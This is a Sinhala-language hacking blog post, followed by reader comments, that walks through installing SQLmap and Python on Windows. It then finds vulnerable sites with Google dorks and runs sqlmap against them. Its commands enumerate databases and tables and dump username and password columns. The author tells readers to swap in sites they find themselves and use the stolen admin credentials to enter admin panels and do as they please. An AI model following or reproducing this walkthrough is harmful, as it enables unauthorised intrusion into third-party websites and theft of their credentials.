Hacking
ගැන
උනන්දු
අයටනම්
මේ
SQLmap කියන
වචනෙ
එච්චර
නුහුරු
වචනයක්
නෙමෙයි.අලුත්
අයටත්
කියන්න
තියෙන්නෙ කලින්
SQL Injection ගැන
පෝස්ට්
එකේ
කරපු
දේම
තමා
මේකෙත්
කරන්නෙ.ඒ
කියන්නෙ Vulnerable
Site එකක්
හොයාගෙන ඒකට
attack එකක්
දෙන
එක.උබල
ගොඩක්ම
SQLmap පාවිච්චි කරනව
දැකල
ඇත්තෙ
ලිනක්ස් වල.අද
මම
කියල
දෙන්න
හදන්නෙ
කොහොමද
වින්ඩෝස් දාපු
මැශින්
එකක
SQLmap එක
පාවිච්චි කරන්නෙ
කියල.
මුලින්ම අපි
SQLmap ඩවුන්ලෝඩ් කරගන්න
ඕනෙ.http://sqlmap.org/ සයිට් ගිහින්
ඔයාලට
පුලුවන් ඒක
කරගන්න.ඕකට
ගිහින්
ඔය
රවුම්
කරල
තියන
Zip file එක
ඩවුන්ලෝඩ් කරගන්න.
ඊටප්ස්සෙ
ඩෙස්ක්ටොප් එකේ
New folder එකක්
හදල ඒක Rename කරන්න sql කියල.දැන් ඔයාල
ඩවුන්ලෝඩ් කරපු
Zip file එක
ඇතුලෙ
තියන
ඔක්කොම
file ටික
අර
ඩෙස්ක්ටොප් එකේ
හදපු
sql ෆෝල්ඩරේට
Extract කරගන්න.
ඊලගට
අපි
Python ඩවුන්ලෝඩ් කරගන්න
ඕනෙ.https://www.python.org/ සයිට් එකට ගිහාම
ඔයාලට
වර්ශන්
දෙකක්
පෙනෙයි.කැමති
එකක්
ගන්න
පුලුවන්.මම
මේ
කෝඩ්
දාන්නෙ
2.7 එකට.පොඩි
කෝඩ්
වෙනස්කම් තමා
තියෙන්නෙ ඒ
හන්ද
ඔයාලත්
ඒකම
ගත්තට
කමන්නෑ.ඩවුන්ලෝඩ්
කරල
ඒක
ඉන්ස්ටෝල් කරහම
ඔයාල
අර
හදපු
sql ෆෝල්ඩරේට ගිහින්
බලන්න
ඒකෙ
පහල
පෙන්නල
තියනව
වගේ
Python logo එකත්
එක්ක
sqlmap.py කියල
ෆයිල්
එකක්
පෙන්නනවද කියල.ඒක
ඒ
වගේ
නෑ
කියන්නෙ හරියට
Python ඩවුන්ලෝඩ් වෙලා
නෑ.
ඔන්න ඔය ඔක්කොම හරි කියන්නෙ SQLmap
වලින් වැඩ කරන්න ඔයාලගෙ මැශින් එකත් ලෑස්තී කියන එක.දැන් ඕපන් කරගන්න cmd එක.ඊටපස්සෙ මුලින්ම ඩෙස්ක්ටොප් එක Locate කරගන්න.ඒකට cd desktop කියල ටයිප් කරල Enter කරන්න.
ඊලගට
sql ෆෝල්ඩරේ
Locate කරගන්න
cd sql කියල
ටයිප්
කරල
Enter කරන්න.ඔන්න
අපි
දැන්
ඉන්නෙ
sql ෆෝල්ඩරේ ඇතුලෙ.දැන්
කලින්
පෝස්ට්
එකේ කියාදුන්න වගේ
ගූගල්
ඩෝර්ක්
එකක්
පාවිච්චි කරල
Vulnerable Site එකක්
හොයාගන්න.
දැන් cmd එකේ මේ
කෝඩ්
එක
දාල
Enter කරන්න.මේකෙ
මම
සයිට්
එකක
නමක්
දාන්නෙ
උබල එතනට හොයාගත්ත
සයිට්
එකේ
නම
දාගෙන
කෝඩ්
එක
වෙනස් කරගනිල්ල හොදද ✌😎.
sqlmap.py
-u https://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs
ඊටපස්සෙ මේ
වගේ
ඔයාලට
දකින්න
පුලුවන් SQLmap එක රන් වෙන
විදිහ.ඔතන
අපෙන්
අහනව
Continue කරන්නද
කියල.ඒකට y දීල Enter කරන්න.ඊටපස්සෙ
ටිකක්
වෙලා
ගිහින්
අපිට
එනව
ඔය
වගේ
ඩේටබේස් එකේ
නම.දැන්
මේ
විදිහට
කෝඩ්
එක
හදල
Enter කරන්න.මේකෙන්
කරන්නෙ
ටේබල්ස් ටික
මොනාද
කියල
බලාගන්න එක.
sqlmap.py
-u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables
ඔතන
webscantest කියල
තියෙන්නෙ ඩේටබේස් එකේ
නම.ඒක
ඔයාලට
ආපු
නම
දාල
වෙනස්
කරන්න.ඔන්න
එතකොට
මේ
වගේ
අපිට
පෙන්නනව ටේබල්
ටික.දැන්
ඔතන
තිබ්බොත් ඇඩ්මින්ට අදාල
මොකක්හරි ටේබල්
එකක්
ඒකෙ
columns ටික
බලාගත්තනම් වැඩේ
ගොඩ.මේකෙ
කොලම්
බලන
හැටි
මම
කියන්නම් උබල
කරද්දි
හොයල
ගාණට
වැඩේ
කරහල්ල.
sqlmap.py
-u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest
-T accounts --columns
මේකෙ
මම
බැලුවෙ
accounts කියන
ටේබල්
එකේ
කොලම්.ආ
දැන්
තේරුනා
නේද
උබලට
ඕන
එකේ
කොලම්
හොයාගන්න හැටි.දැන්
අපිට
ඕන
කොලම්
එකේ
විස්තර
බලමු.
sqlmap.py
-u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest
-T accounts -c uname,passwd --dump
පේනවනෙ
මම
uname,passwd කියන
කොලම්
දෙකේ
විස්තර
බලන්න
තමා
ඔය
කෝඩ්
එක
දැම්මෙ.
උබලත්
දැන්
ඇඩ්මින්ගෙ
Username , Password හොයාගත්තනම් කලින්
කියදුන්න වගේ
ඇඩ්මින් පැනල්
එක
හොයාගෙන ඕන
දෙයක්
කරන්න
තමා
තියෙන්නෙ.ඔන්න
ඔහොම
තමා
වින්ඩෝස් දාපු
මැශින්
එකක
SQLmap එක
පාවිච්චි කරන්නෙ.
SQL Injection වලට
වඩා
මේ
විදිහ
ලේසී
නෙහ්.මේ
විදිහට
ඔන්න
පෝස්ට්
එකත්
ඉවරයි.වැරදි
අඩුපාඩු ඔක්කොම
කියාගෙන යන්න
අමතක
කරන්නෙපා 💓.අලුත්
දේකින්
ආපහු
හම්බෙමු.ජයවේවා
කට්ටියටම
!!!
#ALEX
No One
is Safe Security is a Joke







හැක් කලා තංකූ
ReplyDeleteචොකා <3 පුරුදු වෙයන් ඉන්න ගමන් ඒයි
DeleteElama bro maath welawaka karala balanawa. Python nm thiye sql baaganna oona. Wadee hoda digatama karan yanna. Best of luck - Thushara
ReplyDeleteඑලම මචෝ.අනිත් පෝස්ට් ටිකත් කියවහන්.අලුතින් පටන් ගත්ත හන්ද උබෙ යාලුවො එහෙම මේකට සෙට් කරල සප් එක දියන් <3<3
Deletemewa gas yana wada bro. 🤠 nice tricks. keep it up 🤝👍 jaya
ReplyDeleteHikzz :-) ආස දේනෙ බන්.Anyway Thanks bro
DeleteFatta fatta
ReplyDeleteMChn.. meka apita termux eken krnna barida?
ReplyDelete
DeletePuluwan Bro....Lagadima Termux Post set ekak danna hithan innawa..